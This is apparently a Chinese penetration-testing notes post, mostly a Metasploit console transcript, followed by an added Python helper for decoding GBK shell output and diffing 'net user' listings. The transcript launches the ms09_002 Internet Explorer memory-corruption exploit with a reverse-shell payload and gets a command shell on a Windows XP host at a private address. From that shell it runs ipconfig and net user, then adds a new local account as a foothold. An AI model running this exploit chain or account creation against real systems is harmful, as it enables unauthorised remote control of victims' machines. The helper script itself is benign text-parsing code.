Welcome to the Metasploit Web Console!
[metasploit ASCII-art banner]
=[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 566 exploits - 283 auxiliary
+ -- --=[ 210 payloads - 27 encoders - 8 nops
=[ svn r9834 updated 308 days ago (2010.07.14)
Warning: This copy of the Metasploit Framework was last updated 308 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://www.metasploit.com/redmine/projects/framework/wiki/Updating
>> use windows/browser/ms09_002_memory_corruption
>> set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
>> show options
Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     0.0.0.0          yes       The local host to listen on.
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)

Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows XP SP2-SP3 / Windows Vista SP0 / IE 7
>> set SRVHOST 172.16.2.100
SRVHOST => 172.16.2.100
>> set LHOST 172.16.2.100
LHOST => 172.16.2.100
>> show options
Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     172.16.2.100     yes       The local host to listen on.
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)

Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST     172.16.2.100     yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows XP SP2-SP3 / Windows Vista SP0 / IE 7
>> exploit
[*] Exploit running as background job.
[*] Started reverse handler on 172.16.2.100:4444
[*] Using URL: http://172.16.2.100:8080/9wZVWxuy
[*] Server started.
>> back
>> sessions -l
Active sessions
===============

  Id  Type   Information  Connection
  --  ----   -----------  ----------
  1   shell               172.16.2.100:4444 -> 172.16.2.120:1125
>> sessions -i 1
sessions -i 1
'sessions' is not recognized as an internal or external command, operable program or batch file.
C:\Documents and Settings\Administrator.WWW-95A235B5556\桌面>
>> ipconfig /all
ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : www-95a235b5556
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter
C:\Documents and Settings\Administrator.WWW-95A235B5556\桌面>
>> net user
net user
User accounts for \\WWW-95A235B5556
-------------------------------------------------------------------------------
Administrator Guest HelpAssistant
SUPPORT_388945a0
The command completed successfully.
C:\Documents and Settings\Administrator.WWW-95A235B5556\桌面>
>> net user shentouceshiwy /add
net user shentouceshiwy /add
The command completed successfully.
C:\Documents and Settings\Administrator.WWW-95A235B5556\桌面>
>> net user
net user
User accounts for \\WWW-95A235B5556
-------------------------------------------------------------------------------
Administrator Guest HelpAssistant
shentouceshiwy SUPPORT_388945a0
The command completed successfully.
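Two things in the shell session above deserve a worked example. First, the target is a Chinese-locale Windows XP, so cmd.exe sends its prompts and messages as OEM codepage 936 (GBK) bytes; a console that renders those bytes as Latin-1 shows garbage where "命令成功完成。" (the command completed successfully) should be, which is what the raw transcript looked like. Second, the `net user` listing is taken before and after `net user shentouceshiwy /add`, and the check a tester actually wants is the difference between the two. The script below, added here and not code from the original post or from Metasploit, decodes session bytes with the target's codepage, repairs a Latin-1 mis-decode where that is still possible, and parses and diffs `net user` output. The codepage, the helper names and the sample bytes (built to the shape of zh-CN `net user` output, not captured from the session) are assumptions.

```python
# Added example (not code from the original post or from Metasploit).
# Assumptions, labelled as such: the target is a Chinese-locale Windows XP
# whose cmd.exe writes OEM codepage 936 (GBK); the sample bytes below are
# constructed to match the shape of its `net user` output, not captured.
import re

TARGET_CODEPAGE = "cp936"  # assumed zh-CN OEM codepage (GBK)


def decode_shell_output(raw: bytes, codepage: str = TARGET_CODEPAGE) -> str:
    """Decode bytes read from a reverse shell with the target's codepage.

    Decoding with the console's default (Latin-1 in the transcript) turns
    命令成功完成。 into ÃüÁî³É¹¦Íê³É¡£; decoding as cp936 gives the real text.
    Undecodable bytes are replaced rather than raised, because shell output
    can arrive cut in the middle of a two-byte character.
    """
    return raw.decode(codepage, errors="replace")


def repair_mojibake(text: str, codepage: str = TARGET_CODEPAGE) -> str:
    """Undo a Latin-1 mis-decode of codepage-936 bytes when still possible.

    If the console already substituted '?' for characters (as in the
    transcript) or the text holds non-Latin-1 characters, the original bytes
    are gone: the round trip either fails (text returned unchanged) or yields
    wrong characters, so prefer decoding the raw bytes in the first place.
    """
    try:
        return text.encode("latin-1").decode(codepage)
    except (UnicodeEncodeError, UnicodeDecodeError):
        return text


NET_USER_SEPARATOR = re.compile(r"^-{10,}$")
# Trailer line of `net user` in the zh-CN and en-US locales.
NET_USER_TRAILER = re.compile(r"命令成功完成|completed successfully")


def parse_net_user(output: str) -> set:
    """Return the set of account names in decoded `net user` output.

    Header and trailer are locale-specific, so only the dashed separator and
    the trailer are matched. Names sit in 25-character columns, so a run of
    two or more spaces separates them (a name containing one space survives).
    """
    names = set()
    in_table = False
    for line in output.splitlines():
        stripped = line.strip()
        if NET_USER_SEPARATOR.match(stripped):
            in_table = True
            continue
        if not in_table:
            continue
        if NET_USER_TRAILER.search(stripped):
            break
        if stripped:
            names.update(re.split(r"\s{2,}", stripped))
    return names


def new_accounts(before: str, after: str) -> set:
    """Accounts present after an action but not before (here: net user X /add)."""
    return parse_net_user(after) - parse_net_user(before)


def _net_user_bytes(names) -> bytes:
    """Constructed sample: GBK bytes shaped like zh-CN `net user` output."""
    rows = ["".join(n.ljust(25) for n in names[i:i + 3]).rstrip()
            for i in range(0, len(names), 3)]
    text = ("\\\\WWW-95A235B5556 的用户帐户\r\n\r\n" + "-" * 79 + "\r\n"
            + "\r\n".join(rows) + "\r\n\r\n命令成功完成。\r\n")
    return text.encode(TARGET_CODEPAGE)


SAMPLE_BEFORE = _net_user_bytes(
    ["Administrator", "Guest", "HelpAssistant", "SUPPORT_388945a0"])
SAMPLE_AFTER = _net_user_bytes(
    ["Administrator", "Guest", "HelpAssistant", "shentouceshiwy",
     "SUPPORT_388945a0"])


if __name__ == "__main__":
    print(SAMPLE_AFTER.decode("latin-1").splitlines()[0])    # what the console showed
    print(decode_shell_output(SAMPLE_AFTER).splitlines()[0])  # what the target sent
    print(sorted(new_accounts(decode_shell_output(SAMPLE_BEFORE),
                              decode_shell_output(SAMPLE_AFTER))))
```

Feed the session's raw bytes to `decode_shell_output` rather than repairing text after the fact: once a console has replaced unmappable characters with `?`, as happened in this transcript, the original bytes cannot be recovered. The same decode applies to the `ipconfig /all` and prompt lines.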

Post: 渗透杂记-2013-07-13 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7 (pentest notes, 2013-07-13)
